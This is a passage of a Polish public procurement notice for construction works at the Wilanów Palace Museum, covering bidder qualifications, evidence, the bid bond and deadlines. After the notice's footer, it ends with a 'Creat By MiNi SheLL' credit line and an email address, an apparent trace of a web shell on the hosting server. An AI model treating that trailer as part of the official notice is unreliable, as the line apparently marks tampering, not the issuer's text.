obiektach wpisanych do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****;<br/>c)	posiada doświadczenie w pełnieniu funkcji Koordynatora prac wyposażeniowych podczas realizacji co najmniej dwóch usług/umów u Wykonawcy, w ramach których występowało wyposażenie wnętrz o wartości nie mniejszej niż 300 000,00 zł brutto każde.<br/>d)	przynależy do właściwej izby samorządu zawodowego (legitymuje się aktualnym zaświadczeniem o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa) i posiada aktualne wymagane ubezpieczenie od odpowiedzialności cywilnej.<br/><br/>3) na stanowisko Kierownika badań archeologicznych - jedna osoba, która: <br/>a)	ukończyła co najmniej studia drugiego stopnia lub jednolite studia magisterskie, w zakresie archeologii i przez co najmniej 12 miesięcy brała udział w badaniach archeologicznych, zgodnie z art. 37e ust. 1 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2021 r. poz. 710)<br/>b)	posiada doświadczenie w pełnieniu samodzielnej funkcji kierownika badań archeologicznych**** w ramach co najmniej trzech badań archeologicznych, prowadzonych przy zabytku nieruchomym, wpisanym do rejestru zabytków** lub ewidencji zabytków** lub inwentarza muzealium****<br/>Zamawiający nie dopuszcza wskazywania w ofercie tej samej osoby/osób na więcej niż jedno stanowisko.<br/>Zamawiający nie dopuszcza wskazywania więcej niż jednej osoby na jedno stanowisko.<br/><br/>W przypadku składania wspólnej oferty warunki określone w pkt 1.4 uznaje się za spełnione, jeśli spełnią je łącznie wszyscy Wykonawcy ubiegający się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5.2.	W celu potwierdzenia braku podstaw wykluczenia:<br/>5.2.1.	informacji z Krajowego Rejestru Karnego w zakresie art. 108 ust 1 pkt 1), 2) i 4) ustawy Pzp, sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>5.2.2.	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. jedn. Dz.U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, na formularzu stanowiącym załącznik nr 3c do SWZ,<br/>5.2.3.	odpisu z właściwego rejestru lub z centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy PZP; z zastrzeżeniem art. 127 ustawy pzp, sporządzona nie wcześniej niż 3 miesięcy przed jej złożeniem,<br/>5.2.4.	oświadczenia Wykonawcy, w zakresie art. 109 ust. 1 pkt. 7) o należytym wykonaniu istotnych zobowiązań wynikających z wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, że nie doszło do wypowiedzenia lub odstąpienia od umowy, że wykonawca nie został zobowiązany do zapłaty odszkodowania, nie doszło do wykonania zastępczego lub realizacji uprawnień z tytułu rękojmi za wady, na formularzu stanowiącym Załącznik nr 3d do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>5.1.1.	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - o treści określonej w załączniku nr 4 do SWZ,<br/>5.1.2.	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za realizację robót budowlanych, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - o treści określonej w załączniku nr 5 do SWZ,<br/>5.1.3.	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. Jeżeli wykonawca z uzasadnionych przyczyn nie może złożyć wymaganych przez zamawiającego informacji, wykonawca składa inne środki dowodowe , które w wystarczający sposób potwierdzają spełnianie tego warunku. <br/>*Jako kurs przeliczeniowy na PLN danych finansowych wyrażonych w walutach innych niż PLN, należy przyjąć średni kurs NBP (Tabela A) na dzień zamieszczenia ogłoszenia o zamówieniu dotyczącego przedmiotowego postępowania w Biuletynie Zamówień Publicznych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 52 000,00 złotych (słownie: pięćdziesiąt dwa tysiące złotych).<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>1)	Wadium może być wnoszone wg wyboru Wykonawcy w jednej lub kilku następujących formach, o których mowa w art. 97 ust. 7 ustawy Pzp tj.:<br/>a)	pieniądzu, <br/>b)	gwarancjach bankowych, <br/>c)	gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz.U. z 2020 r. poz. 229).<br/>2)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący numer rachunku bankowego Zamawiającego: 55 1130 1017 0020 1226 4720 0006<br/>z dopiskiem: Wadium – Numer postępowania: DEF.ZP.2401.4.AZ.2021<br/>3)	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 1 lit. b-d, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Do każdego dokumentu wadium sporządzonego w języku innym niż język polski należy załączyć tłumaczenie na język polski.<br/>4)	Potwierdzeniem skutecznego wniesienia wadium będzie: <br/>a)	w przypadku wadium w formie pieniężnej – zaksięgowanie na rachunku bankowym Zamawiającego przed upływem terminu składania ofert;<br/>b)	w przypadku wadium w formie innej niż pieniężna – oryginał dokumentu wadium (gwarancji lub poręczenia) w postaci elektronicznej należy dołączyć do oferty.<br/>1)	Z dokumentu wadium wniesionego w formie gwarancji powinno wynikać jednoznacznie i w sposób nie budzący wątpliwości, gwarantowanie nieodwołalnie oraz bezwarunkowo wypłaty należności z tytułu wadium na pierwsze pisemne żądanie Zamawiającego w terminie nie dłuższym niż 30 dni kalendarzowych od otrzymania pierwszego żądania. <br/>2)	Wadium winno obejmować cały okres związania ofertą poczynając od daty upływu terminu składania ofert.<br/>3)	Gwarancje i poręczenia muszą zawierać (oprócz elementów właściwych dla każdej formy, określonych przepisami prawa):<br/>a)	nazwę i adres Zamawiającego: Muzeum Pałacu Króla Jana III w Wilanowie, ul. Stanisława Kostki Potockiego 10/16, 02-958 Warszawa.<br/>b)	numer postępowania,<br/>c)	termin ważności wadium – odpowiadający terminowi związania ofertą, zgodnie z Rozdziałem XII ust. 1.<br/>Zamawiający odrzuci ofertę, jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3;<br/>1)	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>a)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/>b)	Wykonawca, którego oferta została wybrana:<br/>	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2)	Przepisy prawa dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3)	Postanowienia SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>4)	W przypadku składania oferty wspólnej, warunki udziału w postępowaniu uznaje się za spełnione jeżeli spełnią je łącznie wszyscy Wykonawcy składający ofertę wspólną.<br/>5)	W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają wraz z ofertą pełnomocnictwo lub notarialnie poświadczony odpis tego pełnomocnictwa. <br/>6)	Wszelka korespondencja będzie prowadzona wyłącznie z Pełnomocnikiem.<br/>7)	W przypadku wyboru jako najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający informuje, że będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców.<br/>8)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>9)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oferta, musi być podpisana przez pełnomocnika, o którym mowa pkt. 5 lub przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>10)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w formularzu oferty w miejscu „WYKONAWCA / WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA” należy wpisać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>11)	Poprawki na dokumentach w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia muszą być podpisane przez pełnomocnika, o którym mowa w pkt. 5 lub przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>12)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wystawione przez inne podmioty muszą być oryginałami lub kserokopiami poświadczonymi za zgodność z oryginałem przez pełnomocnika, o którym mowa w pkt. 7 lub przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub przez te podmioty.<br/>Dokumenty składane przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>1.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia i dokumenty, o których mowa w podrozdziale VIII.1 pkt., 1.1, 1.2, 5.2.1, 5.2.2, 5.2.3, 5.2.4 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia i dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o tym który z wykonawców będzie realizował roboty budowlane, składa ten z wykonawców na którego doświadczenie wynikające z podrozdziału VIII.1 pkt. 5.1.1 oraz 5.1.2, powołano się w ofercie. Wzór oświadczenia stanowi Załącznik nr 3e do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Z zastrzeżeniem wyjątków przewidzianych Umową zmiany treści Umowy wymagają pod rygorem nieważności zgody obu Stron, z zachowaniem formy pisemnej.<br/>2.	Zamawiający przewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty Wykonawcy w następującym zakresie:<br/>1)	zmiana wynagrodzenia umownego;<br/>2)	zmiana terminu wykonania Umowy;<br/>3)	zmiana sposobu wykonania Umowy;<br/>4)	zmiana organizacji spełnienia świadczenia;<br/>5)	zmiana stawki VAT wraz z wiążącą się z nią zmianą wynagrodzenia;<br/>6)	zmiany w zakresie płatności.<br/>Warunki wprowadzenia zmian zgodnie z par. 17 Wzoru umowy - załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://muzeum-wilanow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie 15 miesięcy od dnia podpisania umowy, jednak nie później niż do dnia 31.10.2022 r. (odbiór ostateczny), przy czym zakończenie robót budowlanych i zgłoszenie do odbioru końcowego przedmiotu umowy winno nastąpić nie później niż 31 dni przed datą zakończenia umowy, t.j. do dnia 30.09.2022 r.<br/>2. Wykonawca składa ofertę zawierającą:<br/>1.1.	formularz ofertowy – załącznik nr 2 do SWZ <br/>1.2.	oświadczenia - załącznik nr 3a, 3b do SWZ,<br/>1.3.	oświadczenie z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy, którego wzór stanowi załącznik nr 3e do SWZ, <br/>1.4.	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia, na wzorze, który stanowi załącznik nr 7 do SWZ, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy),<br/>3. Przed zawarciem Umowy, Wykonawca:<br/>1)	jest zobowiązany złożyć projekt dokumentu (ów) zabezpieczenia należytego wykonania Umowy o ile zabezpieczenie będzie wnoszone w jednej lub kilku formach o których mowa w podrozdziale XX.2. pkt 1 lit. b-e. Projekt zabezpieczenia należy przesłać Zamawiającemu najpóźniej na dwa dni przed wyznaczonym terminem zawarcia Umowy z uwagi na to, iż projekt zabezpieczenia, wymaga akceptacji Zamawiającego,<br/>2)	musi posiadać firmowy numer bankowy znajdujący się w wykazie informacji o podatnikach VAT – tzw. „biała lista" /art. 117ba ustawy z dnia 29 sierpnia 1997 r. Ordynacja podatkowa - t.j. Dz.U. z 2020 poz. 1325 z późn. zm., oraz art. 19 ustawy z dnia 6 marca 2018 r. Prawo przedsiębiorców - t.j. Dz.U. z 2021 poz. 162/ (jeśli dotyczy),<br/>3)	jeżeli ofertę złożyli Wykonawcy występujący wspólnie, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców,<br/>4)	kopie uprawnień potwierdzające kwalifikacje zawodowe zgodnie z Rozdziałem VII pkt. 1.4 ppkt. 1.4.2 SWZ.<br/>4. Przedmiot zamówienia realizowany będzie ze środków Ministra Kultury, Dziedzictwa Narodowego i Sportu.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com